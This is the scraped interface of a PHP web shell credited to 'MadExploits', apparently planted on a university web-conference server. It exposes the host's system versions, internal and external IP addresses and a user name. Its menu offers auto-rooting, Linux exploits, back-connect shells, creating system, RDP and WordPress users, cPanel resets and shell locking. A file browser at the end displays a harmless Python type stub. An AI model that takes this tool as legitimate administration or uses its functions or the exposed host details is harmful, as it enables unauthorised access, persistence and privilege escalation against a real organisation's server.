Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.147.61.28
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
apt_inst-stubs /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.pyi
849
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __init__.pyi
from typing import * class ArArchive: def extract(self) -> None: ... class DebFile: def __init__(self, file: object) -> None: ... control: TarFile data: TarFile class TarMember: def isblk(self) -> bool: ... def ischr(self) -> bool: ... def isdev(self) -> bool: ... def isdir(self) -> bool: ... def isfifo(self) -> bool: ... def isfile(self) -> bool: ... def islnk(self) -> bool: ... def isreg(self) -> bool: ... def issym(self) -> bool: ... gid: int linkname: str major: int minor: int mode: int mtime: int name: str size: int uid: int class TarFile: def extractall(self, rootdir: str = '') -> None: ... def extractdata(self, member: str) -> bytes: ... def go(self, callback: Callable[[TarMember, bytes], None], member : str = '') -> None: ...
Close